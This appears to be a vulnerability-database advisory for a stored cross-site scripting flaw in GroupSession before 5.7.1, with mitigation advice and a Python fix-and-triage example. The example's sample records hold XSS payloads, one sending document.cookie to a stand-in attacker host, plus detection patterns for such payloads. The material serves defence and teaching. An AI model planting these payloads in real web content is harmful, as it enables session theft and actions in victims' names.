CVE-2025-66284: Cross-site scripting (XSS) in Japan Total System Co.,Ltd. GroupSession Free edition
Stored cross-site scripting vulnerabilities exist in GroupSession Free edition prior to ver5.7.1, GroupSession byCloud prior to ver5.7.1, and GroupSession ZION prior to ver5.7.1. A logged-in user can prepare a malicious page or URL, and an arbitrary script may be executed on the web browser when another user accesses it.
AI Analysis
Technical Summary
CVE-2025-66284 is a stored cross-site scripting (XSS) vulnerability in Japan Total System Co., Ltd.'s GroupSession Free edition, GroupSession byCloud and GroupSession ZION, in every version prior to 5.7.1. An authenticated user can store a malicious page or URL in the application; when another user opens that content, the attacker's script runs in the victim's browser within the GroupSession origin, which can lead to session hijacking, theft of any data the victim can see, or actions performed in the victim's name. Exploitation needs a logged-in account on the attacker's side (an ordinary low-privilege account, not administrative access) and user interaction on the victim's side, i.e. the victim has to view the poisoned page or follow the stored link. The CVSS 3.0 base score is 5.4 (medium): network attack vector, low attack complexity, low privileges required, user interaction required, confidentiality and integrity impacted, availability not impacted. Those values together with the 5.4 score correspond to the vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, the usual scoring for authenticated stored XSS (scope changed because the script executes in the victim's browser rather than in the vulnerable component). No exploitation in the wild was reported as of publication. All affected editions share the same fixed version, so upgrading to 5.7.1 or later is the remediation. The CVE was published on December 12, 2025 with JPCERT/CC as the assigning CNA.
Potential Impact
For European organizations using GroupSession, the vulnerability threatens the confidentiality and integrity of user sessions and of the data those users can reach. Script running in the victim's browser in the GroupSession origin can read the session cookie if it is not marked HttpOnly and, in any case, can issue requests as the victim, so an attacker can read or modify data, send messages or change settings in the victim's name. If GroupSession is integrated with other internal systems (for example through single sign-on or embedded links to them), a compromised account can become a stepping stone toward those systems. Availability is not directly affected, but compromised accounts can still disrupt operations. The preconditions are easy to meet: any logged-in user can plant the payload, and the victim only has to open a page inside the groupware in the normal course of work; no external phishing link is required. Organizations processing personal data covered by GDPR should assess the breach-notification implications of session or data compromise.
Mitigation Recommendations
1. Upgrade every affected edition (GroupSession Free edition, GroupSession byCloud, GroupSession ZION) to 5.7.1 or later. This is the only change that removes the vulnerability; the items below reduce impact while the upgrade is scheduled. For byCloud, confirm with the service provider that the hosted instance has been updated.
2. The underlying fix is contextual output encoding of user-supplied content and validation of stored link URLs (rejecting javascript: and similar schemes). That work is the vendor's and is what 5.7.1 delivers; after upgrading, verify with a harmless test string (a page body containing a script tag, a link using the javascript: scheme) that the content is rendered as inert text rather than executed.
3. Deliver a Content Security Policy (for example from a reverse proxy in front of GroupSession) that disallows inline script and restricts script sources. Roll it out as Content-Security-Policy-Report-Only first, because a policy that blocks inline scripts the application itself relies on will break it.
4. User awareness training has limited value against stored XSS: the payload sits inside trusted groupware pages and fires when a colleague opens them as part of normal work. Treat training as a supplementary measure only.
5. Search stored content for script tags, event-handler attributes and javascript: URLs, and treat any hit from a non-administrative account as a potential exploitation attempt; keep application and access logs long enough to trace who created the content and who viewed it.
6. Limit which accounts can author content visible to other users and remove dormant or shared accounts, since any logged-in user can play the attacker's role.
7. A web application firewall with XSS signatures in front of GroupSession can block unsophisticated payloads at submission time, but signature filters are routinely bypassed and do not replace the upgrade.
8. Make sure the session cookie carries the HttpOnly and Secure flags so that script cannot read it directly (this limits cookie theft but not actions performed within the victim's session), and include stored-XSS checks in regular security testing of the deployment.
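The following Python example is added to this page to illustrate the fix pattern behind items 2 and 5; it is not GroupSession code and nothing about GroupSession's real templates or schema is known from the advisory. The record layout (title, body and link fields), the hostnames and the payloads are constructed for the example. It contrasts a vulnerable render that interpolates stored text and a stored URL verbatim with a hardened render that HTML-encodes text and allow-lists the URL scheme (a "malicious URL" stored in a link field is typically javascript: or a protocol-relative URL), and it includes a small triage scanner that flags already-stored content that looks like a payload.

```python
"""Stored-XSS fix pattern and stored-content triage (illustrative, not
GroupSession code). Record fields, hostnames and payloads are constructed."""
import html
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
_CTRL_WS = re.compile(r"[\t\r\n]")  # browsers drop these anywhere inside a URL


def render_unsafe(rec: dict) -> str:
    # Vulnerable pattern: user-controlled strings placed into HTML verbatim.
    return (f'<h1>{rec["title"]}</h1><div>{rec["body"]}</div>'
            f'<a href="{rec["link"]}">link</a>')


def safe_href(link: str) -> str:
    """Return an href that can only navigate, never execute.

    Tabs and newlines are removed before the scheme check because a browser
    treats "java\\tscript:" as "javascript:". Absolute URLs must be http(s);
    site-relative paths (/foo) are allowed, protocol-relative (//host) are not.
    Anything else collapses to "#". The result is attribute-encoded.
    """
    cleaned = _CTRL_WS.sub("", link).strip()
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme in ALLOWED_SCHEMES:
        return html.escape(cleaned, quote=True)
    if scheme == "" and cleaned.startswith("/") and not cleaned.startswith("//"):
        return html.escape(cleaned, quote=True)
    return "#"


def _esc(text: str) -> str:
    # HTML-body and attribute encoding: < > & " ' become entities.
    return html.escape(text, quote=True)


def render_safe(rec: dict) -> str:
    # Hardened pattern: encode for the HTML context, allow-list the URL scheme.
    return (f'<h1>{_esc(rec["title"])}</h1><div>{_esc(rec["body"])}</div>'
            f'<a href="{safe_href(rec["link"])}">link</a>')


# Triage heuristics for content already in the database. Expect some false
# positives and review hits by hand rather than deleting records automatically.
SUSPICIOUS_PATTERNS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("event-handler", re.compile(r"""(?<=[\s"'])on[a-z]+\s*=""", re.I)),
    ("js-scheme", re.compile(r"(?:javascript|vbscript)\s*:", re.I)),
    ("html-data-uri", re.compile(r"data\s*:\s*text/html", re.I)),
    ("active-element", re.compile(r"<\s*(?:svg|iframe|object|embed)\b", re.I)),
]


def scan_stored_content(records, fields=("title", "body", "link")):
    """Return (record id, field, pattern name) for every suspicious hit."""
    findings = []
    for rec in records:
        for field in fields:
            value = _CTRL_WS.sub("", rec.get(field, ""))
            for name, pattern in SUSPICIOUS_PATTERNS:
                if pattern.search(value):
                    findings.append((rec["id"], field, name))
    return findings


# Constructed sample records: 1 is benign, 2-4 carry typical stored payloads.
SAMPLE_RECORDS = [
    {"id": 1, "title": "Team lunch", "body": "Noon on Friday",
     "link": "https://intranet.example/menu"},
    {"id": 2, "title": "Q4 plan",
     "body": 'Draft<script>fetch("https://attacker.example/?c="+document.cookie)</script>',
     "link": "/docs/q4"},
    {"id": 3, "title": "Survey", "body": "Please answer by Monday",
     "link": "java\tscript:alert(document.domain)"},
    {"id": 4, "title": "Photo", "body": '<img src=x onerror="alert(1)">',
     "link": "https://intranet.example/photo"},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print("UNSAFE:", render_unsafe(rec))
        print("SAFE:  ", render_safe(rec))
    for hit in scan_stored_content(SAMPLE_RECORDS):
        print("flag:", hit)
```

In a real code base the encoding step belongs to the template engine's auto-escaping rather than to hand-written calls; the allow-list on the URL scheme is the part auto-escaping does not give you, because an encoded javascript: URL is still a javascript: URL once the browser decodes the attribute.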
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain
Technical Details
- Data Version: 5.2
- Assigner Short Name: jpcert
- Date Reserved: 2025-11-27T05:41:59.736Z
- CVSS Version: 3.0
- State: PUBLISHED
Threat ID: 693bb362e6d9263eb3473350
Added to database: 12/12/2025, 6:17:06 AM
Last enriched: 12/19/2025, 8:33:40 AM
Last updated: 2/7/2026, 9:00:03 AM